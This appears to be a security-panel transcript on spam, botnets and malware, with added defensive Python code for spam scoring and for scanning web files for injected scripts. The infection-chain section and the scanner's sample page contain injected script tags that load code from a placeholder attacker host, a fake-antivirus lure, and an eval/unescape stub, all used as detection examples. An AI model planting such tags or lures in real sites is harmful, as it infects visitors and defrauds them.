TRANSCRIPT
SPAM/BOTNETS and Malware
Neil Warner, CIO, GoDaddy.com
Moderator: Dan Kaplan, deputy editor, SC Magazine
War Against SPAM
How do you detect SPAM mails?
– Key words
– Heuristics/abnormal behavior
What can you do to defend against it?
– SPAM filters
– Reputation services to block traffic from those spamming IP addresses
– Take down the root cause
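The three detection ideas on this slide (keyword matching, behavioural heuristics and IP reputation) combined into one small scorer. This is an added example, not code from the panel or from GoDaddy; the keyword weights, the reputation list of "spamming" IPs, the threshold and the sample messages are all constructed for illustration.

```python
import re
from dataclasses import dataclass, field

# Constructed stand-in for a reputation feed of known spamming source IPs.
SPAMMING_IPS = {"198.51.100.23", "203.0.113.77"}

# Constructed keyword list; the weights are illustrative, not from any product.
KEYWORDS = {
    "free money": 3.0,
    "click here": 2.0,
    "act now": 2.0,
    "winner": 1.5,
}

SPAM_THRESHOLD = 5.0  # constructed cut-off for the combined score
URL_RE = re.compile(r"https?://[^\s\"'<>]+")


@dataclass
class Verdict:
    score: float = 0.0
    reasons: list = field(default_factory=list)

    @property
    def is_spam(self) -> bool:
        return self.score >= SPAM_THRESHOLD

    def add(self, points: float, why: str) -> None:
        self.score += points
        self.reasons.append(why)


def _domain(addr: str) -> str:
    """Return the domain part of an e-mail address, lower-cased ('' if absent)."""
    return addr.rsplit("@", 1)[-1].strip("<> ").lower() if "@" in addr else ""


def score_message(sender_ip: str, headers: dict, body: str) -> Verdict:
    """Score one message using reputation, key words and heuristics."""
    v = Verdict()

    # 1. Reputation: a known spamming IP is scored high enough to block outright.
    if sender_ip in SPAMMING_IPS:
        v.add(10.0, f"sender IP {sender_ip} is on the reputation blocklist")

    # 2. Key words: each weighted phrase found in the body adds to the score.
    lower = body.lower()
    for phrase, weight in KEYWORDS.items():
        if phrase in lower:
            v.add(weight, f"keyword '{phrase}'")

    # 3. Heuristics / abnormal behaviour.
    letters = [c for c in body if c.isalpha()]
    if letters and sum(c.isupper() for c in letters) / len(letters) > 0.5:
        v.add(2.0, "body is mostly upper-case")

    urls = URL_RE.findall(body)
    if len(urls) >= 3:
        v.add(2.0, f"{len(urls)} links in body")

    from_dom = _domain(headers.get("From", ""))
    path_dom = _domain(headers.get("Return-Path", ""))
    if from_dom and path_dom and from_dom != path_dom:
        v.add(1.5, f"From domain {from_dom} != Return-Path domain {path_dom}")

    return v


# Constructed sample messages: (sender IP, headers, body).
SAMPLES = {
    "newsletter": (
        "192.0.2.10",
        {"From": "news@example.org", "Return-Path": "bounce@example.org"},
        "Hi team, the Q3 report is attached. See https://example.org/q3 for details.",
    ),
    "lottery": (
        "192.0.2.11",
        {"From": "prize@lotto-example.net", "Return-Path": "x@bulk-example.biz"},
        "CONGRATULATIONS WINNER! FREE MONEY WAITING. CLICK HERE NOW: "
        "http://a.example/1 http://b.example/2 http://c.example/3",
    ),
    "blocklisted": (
        "203.0.113.77",
        {"From": "a@example.com", "Return-Path": "a@example.com"},
        "Just checking in about lunch tomorrow.",
    ),
}


def classify_samples() -> dict:
    """Map each sample name to its spam/not-spam verdict."""
    return {name: score_message(*args).is_spam for name, args in SAMPLES.items()}


if __name__ == "__main__":
    for name, args in SAMPLES.items():
        verdict = score_message(*args)
        print(f"{name:12} spam={verdict.is_spam} score={verdict.score} {verdict.reasons}")
```

The reputation check is deliberately weighted above the threshold on its own: it mirrors the slide's point that traffic from known spamming IPs is blocked rather than merely scored, while the keyword and heuristic signals only add up to a block in combination.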
Bot Army
What are botnets used for? How do we detect them? How can we defend against them?
Botnet lifecycle
– Bot-herder configures initial bot parameters such as infection vectors, payload, stealth, C&C details
– Register a DDNS
– Register a static IP
– Bot-herder launches or seeds new bot(s)
– Bots spread
– Causes an increase of DDoS being sent to the victim
– Losing bots to rival botnets
Different types of Malware
Broad category
– Trojans, Rootkits, Backdoors
Malware for fun and profit
– Spyware, Key loggers, Dialers, Bots, Proxies, SEO, etc.
Grayware
Camouflaged attacks
How Does Malware Happen
[Diagram: infection chain, reconstructed from the slide's labels]
– Servers with compromised accounts (Zeus/phishing/etc.)
– FTP/SSH upload of attack shell/script
– Compromised attack server(s)
– Injected tag on the compromised site: <script>http://intermediary.com/ll.php</script>
– Casual web user visits infected site
– Page makes HTTP calls to the infection script (GET http://intermediary.com/ll.php) and the site is infected
– Disposable domain name
– End users see Fake AV: <html>Holy Crap! Infected! Click Here to clean</html>
– $$$$$$
0-day vulnerability in a web application or web server
– Compromises the web sites
– Redirects the end user to a malware site or competitor's website
– Example: Fake AV campaign
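The injected-tag step of this chain is something a site owner can check for directly: scan the site's own files for script tags that load from, or contain, an off-site URL. The example below is added here and is not the panel's or GoDaddy's code. It reuses the slide's placeholder host intermediary.com as the blocklisted entry; the allowlist of legitimate script hosts, the obfuscation patterns and the two sample pages are constructed. A real deployment would feed the blocklist from the domain-list sources referenced on the final slide.

```python
import re
import sys
from pathlib import Path
from urllib.parse import urlparse

# Constructed blocklist; 'intermediary.com' is the placeholder host from the slide.
BLOCKLISTED_DOMAINS = {"intermediary.com"}

# Constructed allowlist of hosts this site legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"www.example-site.com", "cdn.example-site.com"}

# group 1: attributes of the opening tag, group 2: inline body
SCRIPT_TAG_RE = re.compile(r"<script\b([^>]*)>(.*?)</script\s*>", re.I | re.S)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>()]+", re.I)
# Common primitives of obfuscated loaders; constructed, not exhaustive.
OBFUSCATION_RE = re.compile(r"\b(?:eval|unescape)\s*\(|fromCharCode", re.I)


def _is_blocklisted(host: str) -> bool:
    return any(host == d or host.endswith("." + d) for d in BLOCKLISTED_DOMAINS)


def find_suspicious_scripts(html: str) -> list:
    """Return (reason, evidence) pairs for every script tag worth a look."""
    findings = []
    for attrs, inner in SCRIPT_TAG_RE.findall(html):
        candidates = []
        src = SRC_RE.search(attrs)
        if src:
            candidates.append(src.group(1))
        # The slide's injected form puts a bare URL in the script body.
        candidates += URL_RE.findall(inner)

        for url in candidates:
            host = (urlparse(url).hostname or "").lower()
            if not host:
                continue  # relative path on the site itself
            if _is_blocklisted(host):
                findings.append(("blocklisted host", url))
            elif host not in ALLOWED_SCRIPT_HOSTS:
                findings.append(("script src on host not in allowlist", url))

        if OBFUSCATION_RE.search(inner):
            findings.append(("obfuscation primitive in inline script", inner.strip()[:60]))
    return findings


def scan_tree(root) -> dict:
    """Scan every HTML/PHP file under root; map file path to its findings."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in {".html", ".htm", ".php"}:
            findings = find_suspicious_scripts(path.read_text(errors="replace"))
            if findings:
                report[str(path)] = findings
    return report


# Constructed sample pages.
CLEAN_PAGE = """<html><head>
<script src="https://cdn.example-site.com/app.js"></script>
<script>document.getElementById("x").textContent = "hi";</script>
</head><body>Hello</body></html>"""

INJECTED_PAGE = """<html><head>
<script src="/js/main.js"></script>
<script src="https://stats.example.net/t.js"></script>
<script>http://intermediary.com/ll.php</script>
<script src="http://intermediary.com/ll.php"></script>
</head><body>
<script>eval(unescape("..."))</script>
</body></html>"""


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, findings in scan_tree(sys.argv[1]).items():
            print(path)
            for reason, evidence in findings:
                print(f"  {reason}: {evidence}")
    else:
        print("clean page:", find_suspicious_scripts(CLEAN_PAGE))
        print("injected page:", find_suspicious_scripts(INJECTED_PAGE))
```

Run it with the web root as the argument to get a per-file report, or with no argument to see the two constructed pages scored. The allowlist catches an injected loader even when its host is not yet on any blocklist, which matters for the disposable domain names the slide mentions; the obfuscation check covers the case where the injected body hides its URL.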
What Can We Do?
Network/application security tools
– Firewalls
– Intrusion Prevention Systems
– Intrusion Detection Systems
– Web Application Firewalls
– Network Access Controls
– Antivirus
– Reputation-based access
– Code audits
References
– https://zeustracker.abuse.ch/
– http://www.malwaredomainlist.com/
– http://www.phishtank.com/
– http://www.clean-mx.de/
– http://en.wikipedia.org/wiki/Botnet
– http://en.wikipedia.org/wiki/Malware